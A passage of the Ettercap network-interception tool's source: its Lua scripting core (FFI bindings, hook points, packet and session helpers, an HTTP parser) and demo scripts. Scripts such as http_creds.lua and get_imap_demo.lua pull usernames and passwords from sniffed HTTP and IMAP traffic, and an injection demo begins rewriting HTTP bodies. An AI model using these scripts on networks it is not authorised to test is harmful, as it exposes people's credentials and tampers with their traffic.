HOOK_PACKET_PPP, HOOK_PACKET_GRE, HOOK_PACKET_VLAN, HOOK_PACKET_ICMP6, HOOK_PACKET_ICMP6_NSOL, HOOK_PACKET_ICMP6_NADV, HOOK_PACKET_ICMP6_RPLY, HOOK_PACKET_ICMP6_PARM, HOOK_PACKET_PPPOE, HOOK_PACKET_PPP_PAP, HOOK_PACKET_MPLS, HOOK_PACKET_ERF, HOOK_PACKET_ESP, /* high level protocol hooks */ HOOK_PROTO_BASE = 100, HOOK_PROTO_SMB, HOOK_PROTO_SMB_CHL, HOOK_PROTO_SMB_CMPLT, HOOK_PROTO_DHCP_REQUEST, HOOK_PROTO_DHCP_DISCOVER, HOOK_PROTO_DHCP_PROFILE, HOOK_PROTO_DNS, HOOK_PROTO_MDNS, HOOK_PROTO_NBNS, HOOK_PROTO_HTTP, }; enum { E_SUCCESS = 0, E_NOTFOUND = 1, E_NOMATCH = 2, E_NOTHANDLED = 3, E_INVALID = 4, E_NOADDRESS = 5, E_DUPLICATE = 6, E_TIMEOUT = 7, E_INITFAIL = 8, E_FOUND = 128, E_BRIDGE = 129, E_VERSION = 254, E_FATAL = 255, }; // These are magic constants that ettercap uses to identify the session // structures. static const u_int32 IP6_MAGIC = 0x0306e77e; static const u_int32 IP_MAGIC = 0x0300e77e; static const u_int32 TCP_MAGIC = 0x0400e77e; enum { MAX_ASCII_ADDR_LEN = 46 }; static const u_int16 PO_IGNORE = 1; /* this packet should not be processed (e.g. sniffing TARGETS didn't match it) */ static const u_int16 PO_DONT_DISSECT= 1<<1; /* this packet should not be processed by dissector (used during the arp scan) */ static const u_int16 PO_FORWARDABLE = 1<<2; /* the packet has our MAC address, by the IP is not ours */ static const u_int16 PO_FORWARDED = 1<<3; /* the packet was forwarded by us */ static const u_int16 PO_FROMIFACE = 1<<4; /* this packet comes from the primary interface */ static const u_int16 PO_FROMBRIDGE = 1<<5; /* this packet comes form the bridged interface */ static const u_int16 PO_MODIFIED = 1<<6; /* it needs checksum recalculation before forwarding */ static const u_int16 PO_DROPPED = 1<<7; /* the packet has to be dropped */ static const u_int16 PO_DUP = 1<<8; /* the packet is a duplicate we have to free the buffer on destroy */ static const u_int16 PO_FORGED = 1<<9; /* the packet is created by ourselves */ static const u_int16 PO_EOF = 1<<10; /* we are reading from a file and this is the last packet */ static const u_int16 PO_FROMSSL = 1<<11; /* the packet is coming from a ssl wrapper */ static const u_int16 PO_SSLSTART = 1<<12; /* ssl wrapper has to enter SSL state */ char *ip_addr_ntoa(struct ip_addr *sa, char *dst); uint16_t ntohs(uint16_t netshort); size_t tcp_create_ident(void **i, struct packet_object *po); int tcp_find_direction(void *ids, void *id); int session_get(struct ec_session **s, void *ident, size_t ident_len); ]] return ettercap_ffi ettercap-0.8.3.1/src/lua/share/core/ettercap_reg.lua000664 000000 000000 00000003674 13711276346 022245 0ustar00rootroot000000 000000 --- This provides a very simple registry -- -- Copyright (C) Ryan Linn and Mike Ryan -- -- This program is free software; you can redistribute it and/or modify -- it under the terms of the GNU General Public License as published by -- the Free Software Foundation; either version 2 of the License, or -- (at your option) any later version. -- -- This program is distributed in the hope that it will be useful, -- but WITHOUT ANY WARRANTY; without even the implied warranty of -- MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -- GNU General Public License for more details. -- -- You should have received a copy of the GNU General Public License -- along with this program; if not, write to the Free Software -- Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. -- local ettercap_registry = {} --- Indicates if we have a namespace, or not. -- @return true or false, depending on if we have a workspace or not. workspace_exists = function(ns) return (not (ettercap_registry[ns] == nil)) end --- Creates a namespace if it does not already exist, and then returns it. -- @param ns -- @return A table create_namespace = function(ns) local ret = ettercap_registry[ns] if ret == nil then ret = {} ettercap_registry[ns] = ret end return ret end --- Retreives a namespace. Returns nil if the namespace doesn't exist. -- @param ns -- @return A table, or nil get_namespace = function(ns) -- Doesn't matter if it exists or not. It's either nil or not, so we just -- return. return ettercap_registry[ns] end --- Delete's a namespace, effectively. -- @param ns delete_namespace = function(ns) -- Fun fact, if you set a table entry to nil, it deletes the key as well. ettercap_registry[ns] = nil end local reg = {} reg.workspace_exists = workspace_exists reg.create_namespace = create_namespace reg.get_namespace = get_namespace reg.delete_namespace = delete_namespace return reg ettercap-0.8.3.1/src/lua/share/core/hook_points.lua000664 000000 000000 00000014374 13711276346 022134 0ustar00rootroot000000 000000 --- -- Provides hook point values for those setting up ettercap lua scripts. -- -- These values are defined in include/ec_hook.h, so this module will need -- to be updated if that file ever changes! -- -- Copyright (C) Ryan Linn and Mike Ryan -- -- This program is free software; you can redistribute it and/or modify -- it under the terms of the GNU General Public License as published by -- the Free Software Foundation; either version 2 of the License, or -- (at your option) any later version. -- -- This program is distributed in the hope that it will be useful, -- but WITHOUT ANY WARRANTY; without even the implied warranty of -- MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -- GNU General Public License for more details. -- -- You should have received a copy of the GNU General Public License -- along with this program; if not, write to the Free Software -- Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. -- -- @module hook_points --- @usage local usage = [[ ... hook_point = ettercap.hook_points.tcp ... ]] local ffi = require("ettercap_ffi") local hook_points = {} --- All raw packets, prior to any dissecting. --
Defined in include/ec_hook.h as HOOK_RECEIVED hook_points.packet_received = ffi.C.HOOK_RECEIVED --- All packets, after protocol dissecting has been done. --
Defined in include/ec_hook.h as HOOK_DECODED hook_points.protocol_decoded = ffi.C.HOOK_DECODED --- Packets, just prior to being forwarded (if it has to be forwarded). --
Defined in include/ec_hook.h as HOOK_PRE_FORWARD hook_points.pre_forward = ffi.C.HOOK_PRE_FORWARD --- Packets at the top of the stack, but before the decision of PO_INGORE. --
Defined in include/ec_hook.h as HOOK_HANDLED hook_points.handled = ffi.C.HOOK_HANDLED --- All packets at the content filtering point. --
Defined in include/ec_hook.h as HOOK_FILTER hook_points.filter = ffi.C.HOOK_FILTER --- Packets in the TOP HALF (the packet is a copy). --
Defined in include/ec_hook.h as HOOK_DISPATCHER hook_points.dispatcher = ffi.C.HOOK_DISPATCHER --- Any ethernet packet. --
Defined in include/ec_hook.h as HOOK_PACKET_ETH hook_points.eth = ffi.C.HOOK_PACKET_ETH --- Any FDDI packet. --
Defined in include/ec_hook.h as HOOK_PACKET_FDDI hook_points.fddi = ffi.C.HOOK_PACKET_FDDI --- Any token ring packet. --
Defined in include/ec_hook.h as HOOK_PACKET_TR hook_points.token_ring = ffi.C.HOOK_PACKET_TR --- Any wifi packet. --
Defined in include/ec_hook.h as HOOK_PACKET_WIFI hook_points.wifi = ffi.C.HOOK_PACKET_WIFI --- Any ARP packet. --
Defined in include/ec_hook.h as HOOK_PACKET_ARP hook_points.arp = ffi.C.HOOK_PACKET_ARP --- ARP requests. --
Defined in include/ec_hook.h as HOOK_PACKET_ARP_RQ hook_points.arp_request = ffi.C.HOOK_PACKET_ARP_RQ --- ARP replies. --
Defined in include/ec_hook.h as HOOK_PACKET_ARP_RP hook_points.arp_reply = ffi.C.HOOK_PACKET_ARP_RP --- Any IP packet. --
Defined in include/ec_hook.h as HOOK_PACKET_IP hook_points.ip = ffi.C.HOOK_PACKET_IP --- Any IPv6 packet. --
Defined in include/ec_hook.h as HOOK_PACKET_IP6 hook_points.ipv6 = ffi.C.HOOK_PACKET_IP6 --- Any VLAN packet. --
Defined in include/ec_hook.h as HOOK_PACKET_VLAN hook_points.vlan = ffi.C.HOOK_PACKET_VLAN --- Any UDP packet. --
Defined in include/ec_hook.h as HOOK_PACKET_UDP hook_points.udp = ffi.C.HOOK_PACKET_UDP --- Any TCP packet. --
Defined in include/ec_hook.h as HOOK_PACKET_TCP hook_points.tcp = ffi.C.HOOK_PACKET_TCP --- Any ICMP packet. --
Defined in include/ec_hook.h as HOOK_PACKET_ICMP hook_points.icmp = ffi.C.HOOK_PACKET_ICMP --- Any GRE packet. --
Defined in include/ec_hook.h as HOOK_PACKET_GRE hook_points.gre = ffi.C.HOOK_PACKET_GRE --- Any ICMP6 packet. --
Defined in include/ec_hook.h as HOOK_PACKET_ICMP6 hook_points.icmp6 = ffi.C.HOOK_PACKET_ICMP6 --- ICMP6 Neighbor Discovery packets. --
Defined in include/ec_hook.h as HOOK_PACKET_ICMP6_NSOL hook_points.icmp6_nsol = ffi.C.HOOK_PACKET_ICMP6_NSOL --- ICMP6 Nieghbor Advertisement packets. --
Defined in include/ec_hook.h as HOOK_PACKET_ICMP6_NADV hook_points.icmp6_nadv = ffi.C.HOOK_PACKET_ICMP6_NADV --- PPP link control protocol packets. --
Defined in include/ec_hook.h as HOOK_PACKET_LCP hook_points.lcp = ffi.C.HOOK_PACKET_LCP --- PPP encryption control protocol packets. --
Defined in include/ec_hook.h as HOOK_PACKET_ECP hook_points.ecp = ffi.C.HOOK_PACKET_ECP --- PPP IP control protocol packets. --
Defined in include/ec_hook.h as HOOK_PACKET_IPCP hook_points.ipcp = ffi.C.HOOK_PACKET_IPCP --- Any PPP packet. --
Defined in include/ec_hook.h as HOOK_PACKET_PPP hook_points.ppp = ffi.C.HOOK_PACKET_PPP --- Any ESP packet. --
Defined in include/ec_hook.h as HOOK_PROTO_ESP hook_points.esp = ffi.C.HOOK_PACKET_ESP --- Any SMB packet. --
Defined in include/ec_hook.h as HOOK_PROTO_SMB hook_points.smb = ffi.C.HOOK_PROTO_SMB --- SMB challenge packets. --
Defined in include/ec_hook.h as HOOK_PROTO_SMB_CHL hook_points.smb_challenge = ffi.C.HOOK_PROTO_SMB_CHL --- SMB negotiation complete. --
Defined in include/ec_hook.h as HOOK_PROTO_SMB_CMPLT hook_points.smb_complete = ffi.C.HOOK_PROTO_SMB_CMPLT --- DHCP request packets. --
Defined in include/ec_hook.h as HOOK_PROTO_DHCP_REQUEST hook_points.dhcp_request = ffi.C.HOOK_PROTO_DHCP_REQUEST --- DHCP discovery packets. --
Defined in include/ec_hook.h as HOOK_PROTO_DHCP_DISCOVER hook_points.dhcp_discover = ffi.C.HOOK_PROTO_DHCP_DISCOVER --- Any DNS packet. --
Defined in include/ec_hook.h as HOOK_PROTO_DNS hook_points.dns = ffi.C.HOOK_PROTO_DNS --- Any NBNS packet. --
Defined in include/ec_hook.h as HOOK_PROTO_NBNS hook_points.nbns = ffi.C.HOOK_PROTO_NBNS --- *Some* HTTP packets. --
Defined in include/ec_hook.h as HOOK_PROTO_HTTP -- See src/dissectors/ec_http.c. hook_points.http = ffi.C.HOOK_PROTO_HTTP -- Commented out.. Unsure if this should ever be exposed to LUA... -- dhcp_profile = ffi.C.HOOK_PROTO_DHCP_PROFILE, -- DHCP profile ? return hook_points ettercap-0.8.3.1/src/lua/share/core/http.lua000664 000000 000000 00000010371 13711276346 020550 0ustar00rootroot000000 000000 --- -- Parser and functions for HTTP requests/respnoses -- -- Created by Ryan Linn and Mike Ryan -- Copyright (C) 2012 Trustwave Holdings, Inc. local packet = require("packet") local hook_points = require("hook_points") require("ec_string") require("base64") local ports = { 80, 443, 8080 } -- http object that we'll bind all public things to http = {} http.hook = hook_points.http -- parse_post -- Use: split POST data into k/v pieces and put in a table -- Args: POST body -- Out: table of k:v post vars local function parse_args(argstr) if not argstr or argstr == "" then return nil end local args = {} kv = split(argstr,'&') for i,val in ipairs(kv) do local start,finish,k,v = string.find(val, '^(.-)=(.*)') if k and v then args[k] = v end end return args end -- parse_headers -- Use: parses the headers into k:v format -- Args: headers raw string -- Out: table of k:v headers local function parse_headers(headers) if headers == nil then return nil end local h = {} for hline in string.gmatch(headers,"(.-)\r?\n") do local spos,epos,k,v = string.find(hline,"^(%S-): (.*)") if spos and spos > 0 then h[k] = v end end return h end http.get_prefix = function (port) if port == 80 then return "http://" elseif port == 443 then return "https://" elseif port == 8080 then return "proxy://" else return "unknown://" end end local function parse_auth(auth) if not auth or auth == "" then return nil end local start,finish,auth_type, auth_str = string.find(auth, '^(%S+) (.*)') if auth_type == "Basic" then return from_base64(auth_str) end return nil end -- parse_http -- Use: parses a http packet into components -- Args: raw packet -- Out: nil if not a request or response -- table with the following fields: -- - reqest or response set -- - for request -- - verb -- - url -- - httpver -- - post_data (TABLE IF a POST REQUEST) -- - get_data ( TABLE IF a GET REQUEST) -- - for post -- - status_code -- - status_msg -- - http_ver -- -- - headers -- - body http.parse_http = function (pkt) local http_body = packet.read_data(pkt) local p = {} if (http_body == nil) then return nil end local start,finish,header,body = string.find(http_body, '^(.-)\r?\n\r?\n(.*)') if (header == nil or body == nil or header == "") then return nil end if (starts_with(header,"^GET ") > 0 or starts_with(header,"^HEAD ") > 0 or starts_with(header,"^POST ") > 0 or starts_with(header,"^CONNECT ") > 0 ) then local spos,epos, verb, url, httpver = string.find(header,'^(%S+) (.-) HTTP/(%d.%d)') p.request= 1 p.verb = verb p.httpver = httpver p.headers = parse_headers(header) p.body = body if p.headers["Host"] then p.url = http.get_prefix(packet.dst_port(pkt)) .. p.headers["Host"] .. url else p.url = http.get_prefix(packet.dst_port(pkt)) .. packet.dst_ip(pkt) .. url end if p.verb == 'POST' then p.post_data = parse_args(body) end local spos,epos,baseurl,args = string.find(p.url,'^(.-)?(.*)') if baseurl and args then p.baseurl = baseurl p.get_data = parse_args(args) end if p.headers['Authorization'] then p.creds = parse_auth(p.headers['Authorization']) end elseif (starts_with(header,"^HTTP/%d.%d") > 0 ) then p.response = 1 local spos,epos,httpver, code, msg = string.find(header,'^HTTP/(%d.%d) (%d+) (.-)\r?\n') p.httpver = httpver p.status_code = tonumber(code) p.status_msg = msg p.headers = parse_headers(header) p.body = body else return nil end return p end http.session_id = function (p,msg) local session_id = nil if msg.request then session_id = string.format("%s%d%s%d",packet.src_ip(p),packet.src_port(p),packet.dst_ip(p),packet.dst_port(p)) elseif msg.response then session_id = string.format("%s%d%s%d",packet.dst_ip(p),packet.dst_port(p),packet.src_ip(p),packet.src_port(p)) end return session_id end return http ettercap-0.8.3.1/src/lua/share/core/packet.lua000664 000000 000000 00000011500 13711276346 021033 0ustar00rootroot000000 000000 --- Packet manipulation functions -- -- Copyright (C) Ryan Linn and Mike Ryan -- -- This program is free software; you can redistribute it and/or modify -- it under the terms of the GNU General Public License as published by -- the Free Software Foundation; either version 2 of the License, or -- (at your option) any later version. -- -- This program is distributed in the hope that it will be useful, -- but WITHOUT ANY WARRANTY; without even the implied warranty of -- MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -- GNU General Public License for more details. -- -- You should have received a copy of the GNU General Public License -- along with this program; if not, write to the Free Software -- Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. local ffi = require("ettercap_ffi") local bit = require('bit') local addr_buffer_type = ffi.typeof("char[46]") function ip_to_str(ip_addr) local addr_buffer = addr_buffer_type() return(ffi.string(ffi.C.ip_addr_ntoa(ip_addr, addr_buffer))) end --- Gets the src ip, if any, from the packet. -- @param packet_object -- @return string version of IP, or nil src_ip = function(packet_object) local L3 = packet_object.L3 if L3 and L3.src then return ip_to_str(L3.src) end return nil end --- Gets the dst ip, if any, from the packet. -- @param packet_object -- @return string version of IP, or nil dst_ip = function(packet_object) local L3 = packet_object.L3 if L3 and L3.dst then return ip_to_str(L3.dst) end return nil end src_port = function(packet_object) local L4 = packet_object.L4 if L4 and L4.src then return ffi.C.ntohs(L4.src) end return nil end dst_port = function(packet_object) local L4 = packet_object.L4 if L4 and L4.dst then return ffi.C.ntohs(L4.dst) end return nil end --- Returns up to length bytes of the decoded packet DATA section -- @param packet_object -- @param length If specified, will return up to that many bytes of the packet -- data -- @return string read_data = function(packet_object, length) -- Default to the length of the bytes. if (length == nil) then length = packet_object.DATA.len end -- Ensure that we don't read too much data. if (length > packet_object.DATA.len) then length = packet_object.DATA.len end return ffi.string(packet_object.DATA.data, length) end --- Flags the packet as having been modified. -- @param packet_object -- @param integer set_flag = function(po, flag) po.flags = bit.bor(po.flags, flag) end set_dropped = function(po) set_flag(po, ffi.C.PO_DROPPED) end set_modified = function(po) set_flag(po, ffi.C.PO_MODIFIED) end is_dropped = function(po) return bit.band(po.flags, ffi.C.PO_DROPPED) end is_forwardable = function(po) return bit.band(po.flags, ffi.C.PO_FORWARDABLE) end is_forwarded = function(po) return bit.band(po.flags, ffi.C.PO_FORWARDED) end is_from_ssl = function(po) return bit.band(po.flags, ffi.C.PO_FROMSSL) end is_modified = function(po) return bit.band(po.flags, ffi.C.PO_MODIFIED) end is_ssl_start = function(po) return bit.band(po.flags, ffi.C.PO_SSLSTART) end --- Sets the packet data to data, as well as flags the packet as modified. -- @param packet_object -- @param data (string) The new data set_data = function(packet_object, data) local len = string.len(data) if len > packet_object.DATA.len then len = packet_object.DATA.len end ffi.copy(packet_object.DATA.data, data, string.len(data)) set_modified(packet_object) end --- Inspects the packet to see if it is TCP. -- @param packet_object -- @return true or false is_tcp = function(packet_object) return (packet_object.L4 and packet_object.L4.proto == 6) end --- Inspects the packet to see if it is UDP. -- @param packet_object -- @return true or false is_udp = function(packet_object) return (packet_object.L4 and packet_object.L4.proto == 17) end --- Shortcut for telling us if the packet has data (or not) -- @param packet_object -- @return true or false has_data = function(packet_object) return (not (packet_object.DATA == nil) and packet_object.DATA.len > 0) end -- @return string like "1.2.3.4:1234 -> 8.8.8.8:53" l4_summary = function(po) return string.format("%s:%s -> %s:%s", packet.src_ip(po), packet.src_port(po), packet.dst_ip(po), packet.dst_port(po)) end -- Define all the fun little methods. local packet = { read_data = read_data, set_data = set_data, is_tcp = is_tcp, is_udp = is_udp, l4_summary = l4_summary, set_dropped = set_dropped, set_modified = set_modified, is_dropped = is_dropped, is_forwardable = is_forwardable, is_forwarded = is_forwarded, is_from_ssl = is_from_ssl, is_modified = is_modified, is_ssl_start = is_ssl_start, has_data = has_data, src_ip = src_ip, dst_ip = dst_ip, src_port = src_port, dst_port = dst_port } return packet ettercap-0.8.3.1/src/lua/share/core/packet_meta.lua000664 000000 000000 00000004322 13711276346 022045 0ustar00rootroot000000 000000 --- Adds packet methods directly to packet_object ctype -- -- Copyright (C) Ryan Linn and Mike Ryan -- -- This program is free software; you can redistribute it and/or modify -- it under the terms of the GNU General Public License as published by -- the Free Software Foundation; either version 2 of the License, or -- (at your option) any later version. -- -- This program is distributed in the hope that it will be useful, -- but WITHOUT ANY WARRANTY; without even the implied warranty of -- MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -- GNU General Public License for more details. -- -- You should have received a copy of the GNU General Public License -- along with this program; if not, write to the Free Software -- Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. ffi = require('ettercap_ffi') bit = require('bit') packet = require('packet') local po_mt = { __index = { has_data = function(po) return packet.has_data(po) end, is_tcp = function(po) return packet.is_tcp(po) end, is_udp = function(po) return packet.is_udp(po) end, l4_summary = function(po) return packet.l4_summary(po) end, read_data = function(po, length) return packet.read_data(po, length) end, set_data = function(po, data) return packet.set_data(po, data) end, src_ip = function(po) return packet.src_ip(po) end, dst_ip = function(po) return packet.dst_ip(po) end, src_port = function(po) return packet.src_port(po) end, dst_port = function(po) return packet.dst_port(po) end, set_flag = function(po, flag) return packet.set_flag(po, flag) end, set_dropped = function(po) return packet.set_dropped(po) end, set_modified = function(po) return packet.set_modified(po) end, is_dropped = function(po) return packet.is_dropped(po) end, is_forwardable = function(po) return packet.is_forwardable(po) end, is_forwarded = function(po) return packet.is_forwarded(po) end, is_from_ssl = function(po) return packet.is_from_ssl(po) end, is_modified = function(po) return packet.is_modified(po) end, is_ssl_start = function(po) return packet.is_ssl_start(po) end, } } ffi.metatype("struct packet_object", po_mt) return nil ettercap-0.8.3.1/src/lua/share/core/shortpacket.lua000664 000000 000000 00000002505 13711276346 022120 0ustar00rootroot000000 000000 --- -- Like that of shortport in the nselib, shortpacket is designed to provide a -- way to easily generate packetrules. -- -- Copyright (C) Ryan Linn and Mike Ryan -- -- This program is free software; you can redistribute it and/or modify -- it under the terms of the GNU General Public License as published by -- the Free Software Foundation; either version 2 of the License, or -- (at your option) any later version. -- -- This program is distributed in the hope that it will be useful, -- but WITHOUT ANY WARRANTY; without even the implied warranty of -- MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -- GNU General Public License for more details. -- -- You should have received a copy of the GNU General Public License -- along with this program; if not, write to the Free Software -- Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. local packet = require("packet") --- Inspects packet_object.DATA.data to see if it begins with the specified string. -- @param str (string) -- @return function(packet_object) data_starts_with = function(str) len = string.len(str) return(function(packet_object) return(packet.read_data(packet_object, len) == str) end) end local shortpacket = {} shortpacket.data_starts_with = data_starts_with return shortpacket ettercap-0.8.3.1/src/lua/share/core/shortsession.lua000664 000000 000000 00000006131 13711276346 022333 0ustar00rootroot000000 000000 --- -- The purpose of this lib is to provide a simple way of defining the style of -- session tracking that would be employed by a given script. -- -- Copyright (C) Ryan Linn and Mike Ryan -- -- This program is free software; you can redistribute it and/or modify -- it under the terms of the GNU General Public License as published by -- the Free Software Foundation; either version 2 of the License, or -- (at your option) any later version. -- -- This program is distributed in the hope that it will be useful, -- but WITHOUT ANY WARRANTY; without even the implied warranty of -- MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -- GNU General Public License for more details. -- -- You should have received a copy of the GNU General Public License -- along with this program; if not, write to the Free Software -- Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. local ffi = require("ettercap_ffi") local shortsession = {} -- We need the size of a pointer so that we know how to address things properly. local ptr_size = ffi.sizeof("void *") local ident_magic_ptr = ffi.typeof("struct ident_magic *") function magic_session(packet_object, magic_vals) -- Make sure that we've got a table. if (not type(magic_vals) == "table") then return nil end local session = packet_object.session while true do if session == nil then return nil end local ident = session.ident if ident then local ident_magic = ffi.cast(ident_magic_ptr, ident) local magic = tonumber(ident_magic.magic) -- If we have the magic value in our table, then we have are in the -- right spot! if magic_vals[magic] then break end end -- go to the next session in the chain... session = session.prev_session end -- If we've gotten here, then we've found a session. return(ffi.string(session, ptr_size)) end local ip_magic_vals = {[ffi.C.IP_MAGIC] = 1, [ffi.C.IP6_MAGIC] = 1} local tcp_magic_vals = {[ffi.C.TCP_MAGIC] = 1} -- Search down through the session structures for either an IP or IPv6 -- session object. If we find that, then use it. If we don't find the session -- structure, then return nil. -- -- @return string (on success) or nil (on failure) ip_session = function(prefix) return(function(packet_object) local sess_memory_addr = magic_session(packet_object, ip_magic_vals) if not sess_memory_addr then return nil end return(table.concat({prefix, sess_memory_addr}, "-")) end) end -- Search down through the session structures for either a TCP -- session object. If we find that, then use it. If we don't find the session -- structure, then return nil. -- -- @return string (on success) or nil (on failure) tcp_session = function(prefix) return(function(packet_object) local sess_memory_addr = magic_session(packet_object, tcp_magic_vals) if not sess_memory_addr then return nil end return(table.concat({prefix, sess_memory_addr}, "-")) end) end shortsession.ip_session = ip_session shortsession.tcp_session = tcp_session return shortsession ettercap-0.8.3.1/src/lua/share/init.lua.in000664 000000 000000 00000002311 13711276346 020204 0ustar00rootroot000000 000000 -- -- Copyright (C) Ryan Linn and Mike Ryan -- -- This program is free software; you can redistribute it and/or modify -- it under the terms of the GNU General Public License as published by -- the Free Software Foundation; either version 2 of the License, or -- (at your option) any later version. -- -- This program is distributed in the hope that it will be useful, -- but WITHOUT ANY WARRANTY; without even the implied warranty of -- MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -- GNU General Public License for more details. -- -- You should have received a copy of the GNU General Public License -- along with this program; if not, write to the Free Software -- Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. ETTERCAP_LUA_CORE_PATH = "@INSTALL_LUA_CORE@" ETTERCAP_LUA_LIB_PATH = "@INSTALL_LUA_LIBS@" ETTERCAP_LUA_SCRIPT_PATH = "@INSTALL_LUA_SCRIPTS@" ETTERCAP_LUA_THIRD_PARTY_PATH = "@INSTALL_LUA_THIRD_PARTY@" package.path = package.path .. ";" .. ETTERCAP_LUA_CORE_PATH .. "/?.lua" .. ";" .. ETTERCAP_LUA_LIB_PATH .. "/?.lua" .. ";" .. ETTERCAP_LUA_THIRD_PARTY_PATH .. "/?.lua" require("ettercap") ettercap-0.8.3.1/src/lua/share/lib/000775 000000 000000 00000000000 13711276346 016702 5ustar00rootroot000000 000000 ettercap-0.8.3.1/src/lua/share/lib/CMakeLists.txt000664 000000 000000 00000000157 13711276346 021445 0ustar00rootroot000000 000000 # Nothing to install, just yet! # install(FILES # ... # DESTINATION ${INSTALL_LUA_LIBS}) ettercap-0.8.3.1/src/lua/share/scripts/000775 000000 000000 00000000000 13711276346 017623 5ustar00rootroot000000 000000 ettercap-0.8.3.1/src/lua/share/scripts/CMakeLists.txt000664 000000 000000 00000000505 13711276346 022363 0ustar00rootroot000000 000000 install(FILES inject_http.lua inject_http_demo.lua get_imap_demo.lua tcp_session_demo.lua http_creds.lua http_requests.lua inject_http.lua smtp_redir.lua geoip_demo.lua DESTINATION ${INSTALL_LUA_SCRIPTS}) ettercap-0.8.3.1/src/lua/share/scripts/geoip_demo.lua000664 000000 000000 00000002360 13711276346 022436 0ustar00rootroot000000 000000 --- description = [[ This demonstrates the use of GeoIP information in Ettercap. For this script to work, Ettercap MUST have been compiled with '-DHAVE_GEOIP', which is set by the cmake user option ENABLE_GEOIP (ON by default). ]] local ffi = require ('ettercap_ffi') local packet = require ("packet") local hook_points = require ("hook_points") -- Hook at the filtering point -- hook_point = hook_points.filter is_ip = function(p) return (p.L3 and (p.L3.proto == 0x8 or p.L3.proto == 0xDD86)) end -- Optional, but we only want to look at IP-packets. -- packetrule = function (p) if not is_ip(p) then -- ettercap.log ("Ignoring non IP-packet: %d.\n", p.L3.proto) return false end return true end -- Here's your action. -- action = function (p) tstamp = os.date ("%X", p.ts.tv_sec) .. string.format (".%06d", p.ts.tv_usec) src = string.format ("%s:%d", packet.src_ip(p), packet.src_port(p)) dst = string.format ("%s:%d", packet.dst_ip(p), packet.dst_port(p)) src_c = ffi.string (ffi.C.geoip_ccode_by_ip(p.L3.src)) dst_c = ffi.string (ffi.C.geoip_ccode_by_ip(p.L3.dst)) ettercap.log("%s: %-20s -> %-20s: %s -> %s", tstamp, src, dst, src_c, dst_c) end ettercap-0.8.3.1/src/lua/share/scripts/get_imap_demo.lua000664 000000 000000 00000003207 13711276346 023121 0ustar00rootroot000000 000000 --- -- Copyright (C) Ryan Linn and Mike Ryan -- -- This program is free software; you can redistribute it and/or modify -- it under the terms of the GNU General Public License as published by -- the Free Software Foundation; either version 2 of the License, or -- (at your option) any later version. -- -- This program is distributed in the hope that it will be useful, -- but WITHOUT ANY WARRANTY; without even the implied warranty of -- MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -- GNU General Public License for more details. -- -- You should have received a copy of the GNU General Public License -- along with this program; if not, write to the Free Software -- Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. description = "This is a test script to gather imap data"; require 'os' local ffi = require('ettercap_ffi') local hook_points = require("hook_points") local shortpacket = require("shortpacket") local shortsession = require("shortsession") local packet = require("packet") hook_point = hook_points.filter packetrule = function(packet_object) if packet.is_tcp(packet_object) == false then return false end local dst_port = ffi.C.ntohs(packet_object.L4.dst) if not( dst_port == 1143) then return false end -- Check to see if it starts with the right stuff. return true end -- Here's your action. action = function(packet_object) local buf = packet.read_data(packet_object) if string.match(buf,"login") then user,password = string.match(buf,"login \"(%S+)\" \"(%S+)\"") ettercap.log("Got IMAP User %s:%s\n",user,password) end end ettercap-0.8.3.1/src/lua/share/scripts/http_creds.lua000664 000000 000000 00000002405 13711276346 022466 0ustar00rootroot000000 000000 --- -- -- Created by Ryan Linn and Mike Ryan -- Copyright (C) 2012 Trustwave Holdings, Inc. description = "Script to show HTTP requsts"; local http = require("http") local packet = require("packet") hook_point = http.hook packetrule = function(packet_object) -- If this isn't a tcp packet, it's not really a HTTP request -- since we're hooked in the HTTP dissector, we can assume that this -- should never fail, but it's a good sanity check if packet.is_tcp(packet_object) == false then return false end return true end -- Here's your action. action = function(packet_object) local p = packet_object -- Parse the http data into an HTTP object local hobj = http.parse_http(p) -- If there's no http object, get out if hobj == nil then return end -- If it's a request, save the request to the registry -- We'll need this for the response if hobj.request then if hobj.creds then -- Log the request/response with the redirect ettercap.log("HTTP_CREDS: %s:%d -> %s:%d %s %s [User:Pass = %s]\n", packet.src_ip(p), packet.src_port(p), packet.dst_ip(p), packet.dst_port(p), hobj.verb ,hobj.url, hobj.creds) end end end ettercap-0.8.3.1/src/lua/share/scripts/http_inject2_demo.lua000664 000000 000000 00000016032 13711276346 023731 0ustar00rootroot000000 000000 --- -- Copyright (C) Ryan Linn and Mike Ryan -- -- This program is free software; you can redistribute it and/or modify -- it under the terms of the GNU General Public License as published by -- the Free Software Foundation; either version 2 of the License, or -- (at your option) any later version. -- -- This program is distributed in the hope that it will be useful, -- but WITHOUT ANY WARRANTY; without even the implied warranty of -- MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -- GNU General Public License for more details. -- -- You should have received a copy of the GNU General Public License -- along with this program; if not, write to the Free Software -- Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. description = "This demonstrates TCP session tracking."; local ffi = require('ettercap_ffi') local eclib = require('eclib') local hook_points = require("hook_points") local shortsession = require("shortsession") local packet = require("packet") -- We have to hook at the filtering point so that we are certain that all the -- dissectors hae run. hook_point = hook_points.filter function split_http(str) local break_start, header_end= string.find(str, '\r?\n\r?\n') if header_end == nil then -- We only see the headers. So, that's all we got. header_end = string.len(str) end local header = string.sub(str, 0, header_end) local body = string.sub(str,header_end+1) return header, body end function shrink_http_body(body) local modified_body = string.gsub(body, '>%s*<','><') return modified_body end function pad_http_body(body, len) if len 